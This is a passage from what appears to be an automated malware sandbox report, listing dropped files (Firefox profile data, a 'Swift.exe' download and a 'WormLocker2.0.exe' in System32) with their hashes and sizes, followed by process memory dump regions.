                                                                                                                                                                                                                                          1b32d1ec35a7ead1671efc0782b7edf0

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          8e3274b9f2938ff2252ed74779dd6322c601a0c8

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3ed0dec36754402707c2ae4fbfa887fe3089945f6f7c1a8a3e6c1e64ad1c2648

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ab452caa2a529b5bf3874c291f1ffb2a30d9ea43dae5df6a6995dde4bc3506648c749317f0d8e94c31214e62f18f855d933b6d0b6b44634b01e058d3c5fcb499

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\prefs-1.js

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          f148ccb92f198616718757c8a761e136

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          721c9ee3d93e99bee36fd3302508ccf3a2163b5d

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          d932e689460138f979c0935e217d2fe004699d5ab1e64f2c41391fe0d233427e

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          fe736752692faa6f284f6d66d4d5e031e671b2f556e4fcb59afb3a2a6225647966933f98e64f38e73981d7554089cdce033d4f30554cffe02ad704753054383d

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\prefs-1.js

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          9ab40fcf1329db448f9ba35b07085706

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          8ea3c1ad294920d1aea02710a245949810fd1445

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          825a60197ad1703dee58fec9c525ffd437c5a7ef74e5b209a80f43ed76cef1ba

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          9f07b3a0a9aaa3a025e71cd2ff16605a27d9061757a25e3cabff6785bc90017ac881556e99811e51256a2647615009f3600faffd46294b475863805bd5aa028a

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\prefs.js

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          6KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          925d3401f6c533bb58ce73885ee555b6

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          2b639086d245ecf6538e0223f390d95f4bed65e2

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          0a855144b83bffd3cddbb7283d54a2d68ff34f2a6a10cfa32b30dd47336edb86

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          75845b208f9da4307641bec043e3e31d8782967551545f4bc729f36f60e977a0f43b11dcecce60dd5156f169319dfc2d37471eaa48213bb777420aa433786eb8

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\prefs.js

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          7KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          aca1b40d44414953e0cdfcfd9e5c37d1

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          bc2f6d57d5d786e48e58d6203204ff9879bdb2ad

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          136f33a2497f73ad203ec936efa10bf91f6a34cda3f2b023dec5c5e22c47ce2c

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          833b53a50aef04e3d323b4250fe13889c35cdaf9b9d713ed0a7734d7a0f263997f87d149426e7b2366281f205c7a574a6f840ee7dd924d6da150b0274510350e

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3488e612062dd656513e9cc271e25031

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          e2f85a88931fb711a6c4c30cd8e6306b059a5631

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          4c0769e19609245bdf371fa033c570c04680865097f2da6b37d337f5b921a0ad

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          ffb35c919ff11d5abb4ac44377e809a5842f8aca3facfd119b4a758444b37010169a105a2ebad088edb5944a274d51a8a0453d9f7ef01ccf51e1c188ea17d7b9

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.3MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          0c61c1c2854461e54796e43bc9f492d2

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          ffaa6f5c1ecb119a8114fbb100eab003d7c1802d

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          e048cbef8715692ec1d87b5f443be485a313f0242dfd8daf8739236c8c65d5bf

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          b90aa45e01cb29a212c42abded3a3918e662d413ecc91e56bcd07dba25b0e3217127b8ab04c0bd1cd2a3fc7b01633b7f46a118f8d47b3b8b8224253fec368ddd

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.4MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          206d970402fc13d2558f8c8c83b7cff0

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          317817ea517f73a56870357308f7eef4f96c8551

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          4a4176415b4fff2d145cce8c7b20602e9d7e68892954288db63f536ebbe1fbe3

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          cad54aef580c452ff93a621813caac68c08366033ea5dff34649356108ec775df4af898922a2e1f107ec203892a902562e45c064c4b1961083752cc016f6f755

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.4MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          d8551393d99b359277970724352a1a70

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          613bf2a38e5efa0fb64732de1548ea00c1436691

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          5c3d031b52faf0b2ff1f5cc3e47d88bd41cd389fd5064e7c52d667e11313e45e

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          96f02cc8aa5aafb4aa9449f9a99f2817522e82e36ff3ac15d1eadfef69877246c1174ba28abc13f875b0d8cb82cd96f05c35f4573acd1f55fd5b91eabf1eacfe

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.5MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          3517c7f9226c3d9b8077ed121bc3908d

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          633c2996b78b743dc080c75cbda1387395c0f11d

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          79ba73b25af97314d8e4385e8f4083d641c611a75d5bfca74c58f88b121bafa9

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          e775eb4821b86c196d61a989275f234c3deb1177089310bea1a6098dba5625984cb200e78282a0914a336d79ed59b9a6d25a5cf00627548d5aecec43f3287e21

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.5MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          34c24b8fec35ade676ba859b934e61b8

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          93a412d7358df0aca84cecf3392e31e52dacb349

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          c13e85fb81e428707069c5b7329df238a45502c2ce719d8496f99102c52d9894

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          70a5fec2469c17e119bef8822b2319ccea6c5403f230e35d27dbe48f1f23d8df1c009ce4372b6acfdd1b9ac032878c075a9913ef2a605ef7c23cc8a850b313bc

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ptqf56iz.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          3.5MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          878cc1a82dc9ffb2dbf75e48eee6184d

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          23b07589d197aea07825dd5c24c75af887c8748c

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          9c3a140573a240f7cab61094e87172790e2cdd5915a827ae90158406b361755e

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          764fa16a5bf3e34a71a5f2b4fd7a299f523482b06a40ae75a5a5e522ae0cfc455f142fc25b19a676775c230cac9fda10edc1a8b0fcc44171c0c404708acd2065

                                                                                                                                                                                                                                        • C:\Users\Admin\Downloads\Swift.exe.crdownload

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          145KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          8898ddd8e8069788db479b6e256a9f21

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          08eba18f0e9efecb647bb8a969c37e414a1b2705

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          38aa93fcfedaa3bdbdf22034a7dca0c83502fb0c9a20718e436b67b64fa893ea

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          100f315d8d19529972c9c8e72bef62be4c62347487bf699042b55674ca4284120ac006fb88c53463dd0c109a2b59e840e715dc9030fef7946cce41285a702213

                                                                                                                                                                                                                                        • C:\Windows\System32\WormLocker2.0.exe

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          108KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          311190658cb0f8ca99084afdf13773ef

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          c435cdb0701d626b986a9bf4b4bb9fa827193fdb

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          bd189e368d1a84f9ea55659bfed1190bc833a4c152163a2623934dcbf2232de3

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          1e01ab311940c0f4fe88df57a56195a1ce1a58271f7c8780a04a45634530833cf0c2e78e85fce42ae1fd2ea0691dc25f439f3403a38e8da60e5f4ba8c8acbd07

                                                                                                                                                                                                                                        • C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5508_1644892221\LICENSE

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          ee002cb9e51bb8dfa89640a406a1090a

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          49ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          3dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c

                                                                                                                                                                                                                                        • memory/2412-2119-0x000001DC00000000-0x000001DC00022000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                        • memory/2964-2131-0x0000000000420000-0x0000000000474000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          336KB

                                                                                                                                                                                                                                        • memory/3952-1975-0x0000000000D10000-0x0000000000D22000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                        • memory/4696-1997-0x000000001CFE0000-0x000000001D056000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          472KB

                                                                                                                                                                                                                                        • memory/4696-1795-0x0000000001450000-0x0000000001462000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                        • memory/4696-1790-0x00000000009F0000-0x0000000000A1A000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          168KB

                                                                                                                                                                                                                                        • memory/4696-2103-0x0000000002AA0000-0x0000000002AAC000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                                        • memory/4696-1998-0x000000001C0A0000-0x000000001C0AC000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          48KB

                                                                                                                                                                                                                                        • memory/4696-1999-0x000000001C870000-0x000000001C88E000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                        • memory/4696-2061-0x000000001D7C0000-0x000000001D906000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                                                        • memory/5540-748-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-760-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-759-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-758-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-749-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-757-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-756-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-755-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-754-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/5540-750-0x000002936BF90000-0x000002936BF91000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                        • memory/7096-2523-0x0000000000580000-0x00000000005A0000-memory.dmp

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          128KB